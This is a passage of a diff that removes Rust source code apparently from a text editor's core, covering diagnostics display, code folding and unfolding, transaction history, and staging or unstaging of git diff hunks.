Context, - ) { - window.show_character_palette(); - } - - fn refresh_active_diagnostics(&mut self, cx: &mut Context) { - if let ActiveDiagnostic::Group(active_diagnostics) = &mut self.active_diagnostics { - let buffer = self.buffer.read(cx).snapshot(cx); - let primary_range_start = active_diagnostics.active_range.start.to_offset(&buffer); - let primary_range_end = active_diagnostics.active_range.end.to_offset(&buffer); - let is_valid = buffer - .diagnostics_in_range::(primary_range_start..primary_range_end) - .any(|entry| { - entry.diagnostic.is_primary - && !entry.range.is_empty() - && entry.range.start == primary_range_start - && entry.diagnostic.message == active_diagnostics.active_message - }); - - if !is_valid { - self.dismiss_diagnostics(cx); - } - } - } - - pub fn active_diagnostic_group(&self) -> Option<&ActiveDiagnosticGroup> { - match &self.active_diagnostics { - ActiveDiagnostic::Group(group) => Some(group), - _ => None, - } - } - - pub fn set_all_diagnostics_active(&mut self, cx: &mut Context) { - self.dismiss_diagnostics(cx); - self.active_diagnostics = ActiveDiagnostic::All; - } - - fn activate_diagnostics( - &mut self, - buffer_id: BufferId, - diagnostic: DiagnosticEntry, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.active_diagnostics, ActiveDiagnostic::All) { - return; - } - self.dismiss_diagnostics(cx); - let snapshot = self.snapshot(window, cx); - let buffer = self.buffer.read(cx).snapshot(cx); - let Some(renderer) = GlobalDiagnosticRenderer::global(cx) else { - return; - }; - - let diagnostic_group = buffer - .diagnostic_group(buffer_id, diagnostic.diagnostic.group_id) - .collect::>(); - - let blocks = - renderer.render_group(diagnostic_group, buffer_id, snapshot, cx.weak_entity(), cx); - - let blocks = self.display_map.update(cx, |display_map, cx| { - display_map.insert_blocks(blocks, cx).into_iter().collect() - }); - self.active_diagnostics = ActiveDiagnostic::Group(ActiveDiagnosticGroup { - active_range: buffer.anchor_before(diagnostic.range.start) - ..buffer.anchor_after(diagnostic.range.end), - active_message: diagnostic.diagnostic.message.clone(), - group_id: diagnostic.diagnostic.group_id, - blocks, - }); - cx.notify(); - } - - fn dismiss_diagnostics(&mut self, cx: &mut Context) { - if matches!(self.active_diagnostics, ActiveDiagnostic::All) { - return; - }; - - let prev = mem::replace(&mut self.active_diagnostics, ActiveDiagnostic::None); - if let ActiveDiagnostic::Group(group) = prev { - self.display_map.update(cx, |display_map, cx| { - display_map.remove_blocks(group.blocks, cx); - }); - cx.notify(); - } - } - - /// Disable inline diagnostics rendering for this editor. - pub fn disable_inline_diagnostics(&mut self) { - self.inline_diagnostics_enabled = false; - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - } - - pub fn inline_diagnostics_enabled(&self) -> bool { - self.inline_diagnostics_enabled - } - - pub fn show_inline_diagnostics(&self) -> bool { - self.show_inline_diagnostics - } - - pub fn toggle_inline_diagnostics( - &mut self, - _: &ToggleInlineDiagnostics, - window: &mut Window, - cx: &mut Context, - ) { - self.show_inline_diagnostics = !self.show_inline_diagnostics; - self.refresh_inline_diagnostics(false, window, cx); - } - - fn refresh_inline_diagnostics( - &mut self, - debounce: bool, - window: &mut Window, - cx: &mut Context, - ) { - if !self.inline_diagnostics_enabled || !self.show_inline_diagnostics { - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - return; - } - - let debounce_ms = ProjectSettings::get_global(cx) - .diagnostics - .inline - .update_debounce_ms; - let debounce = if debounce && debounce_ms > 0 { - Some(Duration::from_millis(debounce_ms)) - } else { - None - }; - self.inline_diagnostics_update = cx.spawn_in(window, async move |editor, cx| { - let editor = editor.upgrade().unwrap(); - - if let Some(debounce) = debounce { - cx.background_executor().timer(debounce).await; - } - let Some(snapshot) = editor - .update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) - .ok() - else { - return; - }; - - let new_inline_diagnostics = cx - .background_spawn(async move { - let mut inline_diagnostics = Vec::<(Anchor, InlineDiagnostic)>::new(); - for diagnostic_entry in snapshot.diagnostics_in_range(0..snapshot.len()) { - let message = diagnostic_entry - .diagnostic - .message - .split_once('\n') - .map(|(line, _)| line) - .map(SharedString::new) - .unwrap_or_else(|| { - SharedString::from(diagnostic_entry.diagnostic.message) - }); - let start_anchor = snapshot.anchor_before(diagnostic_entry.range.start); - let (Ok(i) | Err(i)) = inline_diagnostics - .binary_search_by(|(probe, _)| probe.cmp(&start_anchor, &snapshot)); - inline_diagnostics.insert( - i, - ( - start_anchor, - InlineDiagnostic { - message, - group_id: diagnostic_entry.diagnostic.group_id, - start: diagnostic_entry.range.start.to_point(&snapshot), - is_primary: diagnostic_entry.diagnostic.is_primary, - severity: diagnostic_entry.diagnostic.severity, - }, - ), - ); - } - inline_diagnostics - }) - .await; - - editor - .update(cx, |editor, cx| { - editor.inline_diagnostics = new_inline_diagnostics; - cx.notify(); - }) - .ok(); - }); - } - - pub fn set_selections_from_remote( - &mut self, - selections: Vec>, - pending_selection: Option>, - window: &mut Window, - cx: &mut Context, - ) { - let old_cursor_position = self.selections.newest_anchor().head(); - self.selections.change_with(cx, |s| { - s.select_anchors(selections); - if let Some(pending_selection) = pending_selection { - s.set_pending(pending_selection, SelectMode::Character); - } else { - s.clear_pending(); - } - }); - self.selections_did_change(false, &old_cursor_position, true, window, cx); - } - - fn push_to_selection_history(&mut self) { - self.selection_history.push(SelectionHistoryEntry { - selections: self.selections.disjoint_anchors(), - select_next_state: self.select_next_state.clone(), - select_prev_state: self.select_prev_state.clone(), - add_selections_state: self.add_selections_state.clone(), - }); - } - - pub fn transact( - &mut self, - window: &mut Window, - cx: &mut Context, - update: impl FnOnce(&mut Self, &mut Window, &mut Context), - ) -> Option { - self.start_transaction_at(Instant::now(), window, cx); - update(self, window, cx); - self.end_transaction_at(Instant::now(), cx) - } - - pub fn start_transaction_at( - &mut self, - now: Instant, - window: &mut Window, - cx: &mut Context, - ) { - self.end_selection(window, cx); - if let Some(tx_id) = self - .buffer - .update(cx, |buffer, cx| buffer.start_transaction_at(now, cx)) - { - self.selection_history - .insert_transaction(tx_id, self.selections.disjoint_anchors()); - cx.emit(EditorEvent::TransactionBegun { - transaction_id: tx_id, - }) - } - } - - pub fn end_transaction_at( - &mut self, - now: Instant, - cx: &mut Context, - ) -> Option { - if let Some(transaction_id) = self - .buffer - .update(cx, |buffer, cx| buffer.end_transaction_at(now, cx)) - { - if let Some((_, end_selections)) = - self.selection_history.transaction_mut(transaction_id) - { - *end_selections = Some(self.selections.disjoint_anchors()); - } else { - log::error!("unexpectedly ended a transaction that wasn't started by this editor"); - } - - cx.emit(EditorEvent::Edited { transaction_id }); - Some(transaction_id) - } else { - None - } - } - - pub fn set_mark(&mut self, _: &actions::SetMark, window: &mut Window, cx: &mut Context) { - if self.selection_mark_mode { - self.change_selections(None, window, cx, |s| { - s.move_with(|_, sel| { - sel.collapse_to(sel.head(), SelectionGoal::None); - }); - }) - } - self.selection_mark_mode = true; - cx.notify(); - } - - pub fn swap_selection_ends( - &mut self, - _: &actions::SwapSelectionEnds, - window: &mut Window, - cx: &mut Context, - ) { - self.change_selections(None, window, cx, |s| { - s.move_with(|_, sel| { - if sel.start != sel.end { - sel.reversed = !sel.reversed - } - }); - }); - self.request_autoscroll(Autoscroll::newest(), cx); - cx.notify(); - } - - pub fn toggle_fold( - &mut self, - _: &actions::ToggleFold, - window: &mut Window, - cx: &mut Context, - ) { - if self.is_singleton(cx) { - let selection = self.selections.newest::(cx); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let range = if selection.is_empty() { - let point = selection.head().to_display_point(&display_map); - let start = DisplayPoint::new(point.row(), 0).to_point(&display_map); - let end = DisplayPoint::new(point.row(), display_map.line_len(point.row())) - .to_point(&display_map); - start..end - } else { - selection.range() - }; - if display_map.folds_in_range(range).next().is_some() { - self.unfold_lines(&Default::default(), window, cx) - } else { - self.fold(&Default::default(), window, cx) - } - } else { - let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); - let buffer_ids: HashSet<_> = self - .selections - .disjoint_anchor_ranges() - .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) - .collect(); - - let should_unfold = buffer_ids - .iter() - .any(|buffer_id| self.is_buffer_folded(*buffer_id, cx)); - - for buffer_id in buffer_ids { - if should_unfold { - self.unfold_buffer(buffer_id, cx); - } else { - self.fold_buffer(buffer_id, cx); - } - } - } - } - - pub fn toggle_fold_recursive( - &mut self, - _: &actions::ToggleFoldRecursive, - window: &mut Window, - cx: &mut Context, - ) { - let selection = self.selections.newest::(cx); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let range = if selection.is_empty() { - let point = selection.head().to_display_point(&display_map); - let start = DisplayPoint::new(point.row(), 0).to_point(&display_map); - let end = DisplayPoint::new(point.row(), display_map.line_len(point.row())) - .to_point(&display_map); - start..end - } else { - selection.range() - }; - if display_map.folds_in_range(range).next().is_some() { - self.unfold_recursive(&Default::default(), window, cx) - } else { - self.fold_recursive(&Default::default(), window, cx) - } - } - - pub fn fold(&mut self, _: &actions::Fold, window: &mut Window, cx: &mut Context) { - if self.is_singleton(cx) { - let mut to_fold = Vec::new(); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let selections = self.selections.all_adjusted(cx); - - for selection in selections { - let range = selection.range().sorted(); - let buffer_start_row = range.start.row; - - if range.start.row != range.end.row { - let mut found = false; - let mut row = range.start.row; - while row <= range.end.row { - if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) - { - found = true; - row = crease.range().end.row + 1; - to_fold.push(crease); - } else { - row += 1 - } - } - if found { - continue; - } - } - - for row in (0..=range.start.row).rev() { - if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { - if crease.range().end.row >= buffer_start_row { - to_fold.push(crease); - if row <= range.start.row { - break; - } - } - } - } - } - - self.fold_creases(to_fold, true, window, cx); - } else { - let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); - let buffer_ids = self - .selections - .disjoint_anchor_ranges() - .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) - .collect::>(); - for buffer_id in buffer_ids { - self.fold_buffer(buffer_id, cx); - } - } - } - - fn fold_at_level( - &mut self, - fold_at: &FoldAtLevel, - window: &mut Window, - cx: &mut Context, - ) { - if !self.buffer.read(cx).is_singleton() { - return; - } - - let fold_at_level = fold_at.0; - let snapshot = self.buffer.read(cx).snapshot(cx); - let mut to_fold = Vec::new(); - let mut stack = vec![(0, snapshot.max_row().0, 1)]; - - while let Some((mut start_row, end_row, current_level)) = stack.pop() { - while start_row < end_row { - match self - .snapshot(window, cx) - .crease_for_buffer_row(MultiBufferRow(start_row)) - { - Some(crease) => { - let nested_start_row = crease.range().start.row + 1; - let nested_end_row = crease.range().end.row; - - if current_level < fold_at_level { - stack.push((nested_start_row, nested_end_row, current_level + 1)); - } else if current_level == fold_at_level { - to_fold.push(crease); - } - - start_row = nested_end_row + 1; - } - None => start_row += 1, - } - } - } - - self.fold_creases(to_fold, true, window, cx); - } - - pub fn fold_all(&mut self, _: &actions::FoldAll, window: &mut Window, cx: &mut Context) { - if self.buffer.read(cx).is_singleton() { - let mut fold_ranges = Vec::new(); - let snapshot = self.buffer.read(cx).snapshot(cx); - - for row in 0..snapshot.max_row().0 { - if let Some(foldable_range) = self - .snapshot(window, cx) - .crease_for_buffer_row(MultiBufferRow(row)) - { - fold_ranges.push(foldable_range); - } - } - - self.fold_creases(fold_ranges, true, window, cx); - } else { - self.toggle_fold_multiple_buffers = cx.spawn_in(window, async move |editor, cx| { - editor - .update_in(cx, |editor, _, cx| { - for buffer_id in editor.buffer.read(cx).excerpt_buffer_ids() { - editor.fold_buffer(buffer_id, cx); - } - }) - .ok(); - }); - } - } - - pub fn fold_function_bodies( - &mut self, - _: &actions::FoldFunctionBodies, - window: &mut Window, - cx: &mut Context, - ) { - let snapshot = self.buffer.read(cx).snapshot(cx); - - let ranges = snapshot - .text_object_ranges(0..snapshot.len(), TreeSitterOptions::default()) - .filter_map(|(range, obj)| (obj == TextObject::InsideFunction).then_some(range)) - .collect::>(); - - let creases = ranges - .into_iter() - .map(|range| Crease::simple(range, self.display_map.read(cx).fold_placeholder.clone())) - .collect(); - - self.fold_creases(creases, true, window, cx); - } - - pub fn fold_recursive( - &mut self, - _: &actions::FoldRecursive, - window: &mut Window, - cx: &mut Context, - ) { - let mut to_fold = Vec::new(); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let selections = self.selections.all_adjusted(cx); - - for selection in selections { - let range = selection.range().sorted(); - let buffer_start_row = range.start.row; - - if range.start.row != range.end.row { - let mut found = false; - for row in range.start.row..=range.end.row { - if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { - found = true; - to_fold.push(crease); - } - } - if found { - continue; - } - } - - for row in (0..=range.start.row).rev() { - if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { - if crease.range().end.row >= buffer_start_row { - to_fold.push(crease); - } else { - break; - } - } - } - } - - self.fold_creases(to_fold, true, window, cx); - } - - pub fn fold_at( - &mut self, - buffer_row: MultiBufferRow, - window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - - if let Some(crease) = display_map.crease_for_buffer_row(buffer_row) { - let autoscroll = self - .selections - .all::(cx) - .iter() - .any(|selection| crease.range().overlaps(&selection.range())); - - self.fold_creases(vec![crease], autoscroll, window, cx); - } - } - - pub fn unfold_lines(&mut self, _: &UnfoldLines, _window: &mut Window, cx: &mut Context) { - if self.is_singleton(cx) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = &display_map.buffer_snapshot; - let selections = self.selections.all::(cx); - let ranges = selections - .iter() - .map(|s| { - let range = s.display_range(&display_map).sorted(); - let mut start = range.start.to_point(&display_map); - let mut end = range.end.to_point(&display_map); - start.column = 0; - end.column = buffer.line_len(MultiBufferRow(end.row)); - start..end - }) - .collect::>(); - - self.unfold_ranges(&ranges, true, true, cx); - } else { - let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); - let buffer_ids = self - .selections - .disjoint_anchor_ranges() - .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) - .collect::>(); - for buffer_id in buffer_ids { - self.unfold_buffer(buffer_id, cx); - } - } - } - - pub fn unfold_recursive( - &mut self, - _: &UnfoldRecursive, - _window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let selections = self.selections.all::(cx); - let ranges = selections - .iter() - .map(|s| { - let mut range = s.display_range(&display_map).sorted(); - *range.start.column_mut() = 0; - *range.end.column_mut() = display_map.line_len(range.end.row()); - let start = range.start.to_point(&display_map); - let end = range.end.to_point(&display_map); - start..end - }) - .collect::>(); - - self.unfold_ranges(&ranges, true, true, cx); - } - - pub fn unfold_at( - &mut self, - buffer_row: MultiBufferRow, - _window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - - let intersection_range = Point::new(buffer_row.0, 0) - ..Point::new( - buffer_row.0, - display_map.buffer_snapshot.line_len(buffer_row), - ); - - let autoscroll = self - .selections - .all::(cx) - .iter() - .any(|selection| RangeExt::overlaps(&selection.range(), &intersection_range)); - - self.unfold_ranges(&[intersection_range], true, autoscroll, cx); - } - - pub fn unfold_all( - &mut self, - _: &actions::UnfoldAll, - _window: &mut Window, - cx: &mut Context, - ) { - if self.buffer.read(cx).is_singleton() { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - self.unfold_ranges(&[0..display_map.buffer_snapshot.len()], true, true, cx); - } else { - self.toggle_fold_multiple_buffers = cx.spawn(async move |editor, cx| { - editor - .update(cx, |editor, cx| { - for buffer_id in editor.buffer.read(cx).excerpt_buffer_ids() { - editor.unfold_buffer(buffer_id, cx); - } - }) - .ok(); - }); - } - } - - pub fn fold_selected_ranges( - &mut self, - _: &FoldSelectedRanges, - window: &mut Window, - cx: &mut Context, - ) { - let selections = self.selections.all_adjusted(cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let ranges = selections - .into_iter() - .map(|s| Crease::simple(s.range(), display_map.fold_placeholder.clone())) - .collect::>(); - self.fold_creases(ranges, true, window, cx); - } - - pub fn fold_ranges( - &mut self, - ranges: Vec>, - auto_scroll: bool, - window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let ranges = ranges - .into_iter() - .map(|r| Crease::simple(r, display_map.fold_placeholder.clone())) - .collect::>(); - self.fold_creases(ranges, auto_scroll, window, cx); - } - - pub fn fold_creases( - &mut self, - creases: Vec>, - auto_scroll: bool, - _window: &mut Window, - cx: &mut Context, - ) { - if creases.is_empty() { - return; - } - - let mut buffers_affected = HashSet::default(); - let multi_buffer = self.buffer().read(cx); - for crease in &creases { - if let Some((_, buffer, _)) = - multi_buffer.excerpt_containing(crease.range().start.clone(), cx) - { - buffers_affected.insert(buffer.read(cx).remote_id()); - }; - } - - self.display_map.update(cx, |map, cx| map.fold(creases, cx)); - - if auto_scroll { - self.request_autoscroll(Autoscroll::fit(), cx); - } - - cx.notify(); - - self.scrollbar_marker_state.dirty = true; - self.folds_did_change(cx); - } - - /// Removes any folds whose ranges intersect any of the given ranges. - pub fn unfold_ranges( - &mut self, - ranges: &[Range], - inclusive: bool, - auto_scroll: bool, - cx: &mut Context, - ) { - self.remove_folds_with(ranges, auto_scroll, cx, |map, cx| { - map.unfold_intersecting(ranges.iter().cloned(), inclusive, cx) - }); - self.folds_did_change(cx); - } - - pub fn fold_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { - if self.buffer().read(cx).is_singleton() || self.is_buffer_folded(buffer_id, cx) { - return; - } - let folded_excerpts = self.buffer().read(cx).excerpts_for_buffer(buffer_id, cx); - self.display_map.update(cx, |display_map, cx| { - display_map.fold_buffers([buffer_id], cx) - }); - cx.emit(EditorEvent::BufferFoldToggled { - ids: folded_excerpts.iter().map(|&(id, _)| id).collect(), - folded: true, - }); - cx.notify(); - } - - pub fn unfold_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { - if self.buffer().read(cx).is_singleton() || !self.is_buffer_folded(buffer_id, cx) { - return; - } - let unfolded_excerpts = self.buffer().read(cx).excerpts_for_buffer(buffer_id, cx); - self.display_map.update(cx, |display_map, cx| { - display_map.unfold_buffers([buffer_id], cx); - }); - cx.emit(EditorEvent::BufferFoldToggled { - ids: unfolded_excerpts.iter().map(|&(id, _)| id).collect(), - folded: false, - }); - cx.notify(); - } - - pub fn is_buffer_folded(&self, buffer: BufferId, cx: &App) -> bool { - self.display_map.read(cx).is_buffer_folded(buffer) - } - - pub fn folded_buffers<'a>(&self, cx: &'a App) -> &'a HashSet { - self.display_map.read(cx).folded_buffers() - } - - pub fn disable_header_for_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { - self.display_map.update(cx, |display_map, cx| { - display_map.disable_header_for_buffer(buffer_id, cx); - }); - cx.notify(); - } - - /// Removes any folds with the given ranges. - pub fn remove_folds_with_type( - &mut self, - ranges: &[Range], - type_id: TypeId, - auto_scroll: bool, - cx: &mut Context, - ) { - self.remove_folds_with(ranges, auto_scroll, cx, |map, cx| { - map.remove_folds_with_type(ranges.iter().cloned(), type_id, cx) - }); - self.folds_did_change(cx); - } - - fn remove_folds_with( - &mut self, - ranges: &[Range], - auto_scroll: bool, - cx: &mut Context, - update: impl FnOnce(&mut DisplayMap, &mut Context), - ) { - if ranges.is_empty() { - return; - } - - let mut buffers_affected = HashSet::default(); - let multi_buffer = self.buffer().read(cx); - for range in ranges { - if let Some((_, buffer, _)) = multi_buffer.excerpt_containing(range.start.clone(), cx) { - buffers_affected.insert(buffer.read(cx).remote_id()); - }; - } - - self.display_map.update(cx, update); - - if auto_scroll { - self.request_autoscroll(Autoscroll::fit(), cx); - } - - cx.notify(); - self.scrollbar_marker_state.dirty = true; - self.active_indent_guides_state.dirty = true; - } - - pub fn update_fold_widths( - &mut self, - widths: impl IntoIterator, - cx: &mut Context, - ) -> bool { - self.display_map - .update(cx, |map, cx| map.update_fold_widths(widths, cx)) - } - - pub fn default_fold_placeholder(&self, cx: &App) -> FoldPlaceholder { - self.display_map.read(cx).fold_placeholder.clone() - } - - pub fn set_expand_all_diff_hunks(&mut self, cx: &mut App) { - self.buffer.update(cx, |buffer, cx| { - buffer.set_all_diff_hunks_expanded(cx); - }); - } - - pub fn expand_all_diff_hunks( - &mut self, - _: &ExpandAllDiffHunks, - _window: &mut Window, - cx: &mut Context, - ) { - self.buffer.update(cx, |buffer, cx| { - buffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx) - }); - } - - pub fn toggle_selected_diff_hunks( - &mut self, - _: &ToggleSelectedDiffHunks, - _window: &mut Window, - cx: &mut Context, - ) { - let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); - self.toggle_diff_hunks_in_ranges(ranges, cx); - } - - pub fn diff_hunks_in_ranges<'a>( - &'a self, - ranges: &'a [Range], - buffer: &'a MultiBufferSnapshot, - ) -> impl 'a + Iterator { - ranges.iter().flat_map(move |range| { - let end_excerpt_id = range.end.excerpt_id; - let range = range.to_point(buffer); - let mut peek_end = range.end; - if range.end.row < buffer.max_row().0 { - peek_end = Point::new(range.end.row + 1, 0); - } - buffer - .diff_hunks_in_range(range.start..peek_end) - .filter(move |hunk| hunk.excerpt_id.cmp(&end_excerpt_id, buffer).is_le()) - }) - } - - pub fn has_stageable_diff_hunks_in_ranges( - &self, - ranges: &[Range], - snapshot: &MultiBufferSnapshot, - ) -> bool { - let mut hunks = self.diff_hunks_in_ranges(ranges, &snapshot); - hunks.any(|hunk| hunk.status().has_secondary_hunk()) - } - - pub fn toggle_staged_selected_diff_hunks( - &mut self, - _: &::git::ToggleStaged, - _: &mut Window, - cx: &mut Context, - ) { - let snapshot = self.buffer.read(cx).snapshot(cx); - let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); - let stage = self.has_stageable_diff_hunks_in_ranges(&ranges, &snapshot); - self.stage_or_unstage_diff_hunks(stage, ranges, cx); - } - - pub fn set_render_diff_hunk_controls( - &mut self, - render_diff_hunk_controls: RenderDiffHunkControlsFn, - cx: &mut Context, - ) { - self.render_diff_hunk_controls = render_diff_hunk_controls; - cx.notify(); - } - - pub fn stage_and_next( - &mut self, - _: &::git::StageAndNext, - window: &mut Window, - cx: &mut Context, - ) { - self.do_stage_or_unstage_and_next(true, window, cx); - } - - pub fn unstage_and_next( - &mut self, - _: &::git::UnstageAndNext, - window: &mut Window, - cx: &mut Context, - ) { - self.do_stage_or_unstage_and_next(false, window, cx); - } - - pub fn stage_or_unstage_diff_hunks( - &mut self, - stage: bool, - ranges: Vec>, - cx: &mut Context, - ) { - let task = self.save_buffers_for_ranges_if_needed(&ranges, cx); - cx.spawn(async move |this, cx| { - task.await?; - this.update(cx, |this, cx| { - let snapshot = this.buffer.read(cx).snapshot(cx); - let chunk_by = this - .diff_hunks_in_ranges(&ranges, &snapshot) - .chunk_by(|hunk| hunk.buffer_id); - for (buffer_id, hunks) in &chunk_by { - this.do_stage_or_unstage(stage, buffer_id, hunks, cx); - } - }) - }) - .detach_and_log_err(cx); - } - - fn save_buffers_for_ranges_if_needed( - &mut self, - ranges: &[Range], - cx: &mut Context, - ) -> Task> { - let multibuffer = self.buffer.read(cx); - let snapshot = multibuffer.read(cx); - let buffer_ids: HashSet<_> = ranges - .iter() - .flat_map(|range| snapshot.buffer_ids_for_range(range.clone())) - .collect(); - drop(snapshot); - - let mut buffers = HashSet::default(); - for buffer_id in buffer_ids { - if let Some(buffer_entity) = multibuffer.buffer(buffer_id) { - let buffer = buffer_entity.read(cx); - if buffer.file().is_some_and(|file| file.disk_state().exists()) && buffer.is_dirty() - { - buffers.insert(buffer_entity); - } - } - } - - if let Some(project) = &self.project { - project.update(cx, |project, cx| project.save_buffers(buffers, cx)) - } else { - Task::ready(Ok(())) - } - } - - fn do_stage_or_unstage_and_next( - &mut self, - stage: bool, - window: &mut Window, - cx: &mut Context, - ) { - let ranges = self.selections.disjoint_anchor_ranges().collect::>(); - - if ranges.iter().any(|range| range.start != range.end) { - self.stage_or_unstage_diff_hunks(stage, ranges, cx); - return; - } - - self.stage_or_unstage_diff_hunks(stage, ranges, cx); - let snapshot = self.snapshot(window, cx); - let position = self.selections.newest::(cx).head(); - let mut row = snapshot - .buffer_snapshot - .diff_hunks_in_range(position..snapshot.buffer_snapshot.max_point()) - .find(|hunk| hunk.row_range.start.0 > position.row) - .map(|hunk| hunk.row_range.start); - - let all_diff_hunks_expanded = self.buffer().read(cx).all_diff_hunks_expanded(); - // Outside of the project diff editor, wrap around to the beginning. - if !all_diff_hunks_expanded { - row = row.or_else(|| { - snapshot - .buffer_snapshot - .diff_hunks_in_range(Point::zero()..position) - .find(|hunk| hunk.row_range.end.0 < position.row) - .map(|hunk| hunk.row_range.start) - }); - } - - if let Some(row) = row { - let destination = Point::new(row.0, 0); - let autoscroll = Autoscroll::center(); - - self.unfold_ranges(&[destination..destination], false, false, cx); - self.change_selections(Some(autoscroll), window, cx, |s| { - s.select_ranges([destination..destination]); - }); - } - } - - fn do_stage_or_unstage( - &self, - stage: bool, - buffer_id: BufferId, - hunks: impl Iterator, - cx: &mut App, - ) -> Option<()> { - let project = self.project.as_ref()?; - let buffer = project.read(cx).buffer_for_id(buffer_id, cx)?; - let diff = self.buffer.read(cx).diff_for(buffer_id)?; - let buffer_snapshot = buffer.read(cx).snapshot(); - let file_exists = buffer_snapshot - .file() - .is_some_and(|file| file.disk_state().exists()); - diff.update(cx, |diff, cx| { - diff.stage_or_unstage_hunks( - stage, - &hunks - .map(|hunk| buffer_diff::DiffHunk { - buffer_range: hunk.buffer_range, - diff_base_byte_range: hunk.diff_base_byte_range, - secondary_status: hunk.secondary_status, - range: Point::zero()..Point::zero(), // unused - }) - .collect::>(), - &buffer_snapshot, - file_exists, - cx, - ) - }); - None - } - - pub fn expand_selected_diff_hunks(&mut self, cx: &mut Context) { - let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); - self.buffer - .update(cx, |buffer, cx| buffer.expand_diff_hunks(ranges, cx)) - } - - pub fn clear_expanded_diff_hunks(&mut self, cx: &mut Context) -> bool { - self.buffer.update(cx, |buffer, cx| { - let ranges = vec![Anchor::min()..Anchor::max()]; - if !buffer.all_diff_hunks_expanded() - && buffer.has_expanded_diff_hunks_in_ranges(&ranges, cx) - { - buffer.collapse_diff_hunks(ranges, cx); - true - } else { - false - } - }) - } - - fn toggle_diff_hunks_in_ranges( - &mut self, - ranges: Vec>, - cx: &mut Context, - ) { - self.buffer.update(cx, |buffer, cx| { - let expand = !buffer.has_expanded_diff_hunks_in_ranges(&ranges, cx); - buffer.expand_or_collapse_diff_hunks(ranges, expand, cx); - }) - } - - fn toggle_single_diff_hunk(&mut self, range: Range, cx: &mut Context) { - self.buffer.update(cx, |buffer, cx| { - let snapshot = buffer.snapshot(cx); - let excerpt_id = range.end.excerpt_id; - let point_range = range.to_point(&snapshot); - let expand = !buffer.single_hunk_is_expanded(range, cx); - buffer.expand_or_collapse_diff_hunks_inner([(point_range, excerpt_id)], expand, cx); - }) - } - - pub(crate) fn apply_all_diff_hunks( - &mut self, - _: &ApplyAllDiffHunks, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let buffers = self.buffer.read(cx).all_buffers(); - for branch_buffer in buffers { - branch_buffer.update(cx, |branch_buffer, cx| { - branch_buffer.merge_into_base(Vec::new(), cx); - }); - } - - if let Some(project) = self.project.clone() { - self.save(true, project, window, cx).detach_and_log_err(cx); - } - } - - pub(crate) fn apply_selected_diff_hunks( - &mut self, - _: &ApplyDiffHunk, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let snapshot = self.snapshot(window, cx); - let hunks = snapshot.hunks_for_ranges(self.selections.ranges(cx)); - let mut ranges_by_buffer = HashMap::default(); - self.transact(window, cx, |editor, _window, cx| { - for hunk in hunks { - if let Some(buffer) = editor.buffer.read(cx).buffer(hunk.buffer_id) { - ranges_by_buffer - .entry(buffer.clone()) - .or_insert_with(Vec::new) - .push(hunk.buffer_range.to_offset(buffer.read(cx))); - } - } - - for (buffer, ranges) in ranges_by_buffer { - buffer.update(cx, |buffer, cx| { - buffer.merge_into_base(ranges, cx); - }); - } - }); - - if let Some(project) = self.project.clone() { - self.save(true, project, window, cx).detach_and_log_err(cx); - } - } - - pub fn set_gutter_hovered(&mut self, hovered: bool, cx: &mut Context) { - if hovered != self.gutter_hovered { - self.gutter_hovered = hovered; - cx.notify(); - } - } - - pub fn insert_blocks( - &mut self, - blocks: impl IntoIterator>, - autoscroll: Option, - cx: &mut Context, - ) -> Vec { - let blocks = self - .display_map - .update(cx, |display_map, cx| display_map.insert_blocks(blocks, cx)); - if let Some(autoscroll) = autoscroll { - self.request_autoscroll(autoscroll, cx); - } - cx.notify(); - blocks - } - - pub fn resize_blocks( - &mut self, - heights: HashMap, - autoscroll: Option, - cx: &mut Context, - ) { - self.display_map - .update(cx, |display_map, cx| display_map.resize_blocks(heights, cx)); - if let Some(autoscroll) = autoscroll { - self.request_autoscroll(autoscroll, cx); - } - cx.notify(); - } - - pub fn replace_blocks( - &mut self, - renderers: HashMap, - autoscroll: Option, - cx: &mut Context, - ) { - self.display_map - .update(cx, |display_map, _cx| display_map.replace_blocks(renderers)); - if let Some(autoscroll) = autoscroll { - self.request_autoscroll(autoscroll, cx); - } - cx.notify(); - } - - pub fn remove_blocks( - &mut self, - block_ids: HashSet, - autoscroll: Option, - cx: &mut Context, - ) { - self.display_map.update(cx, 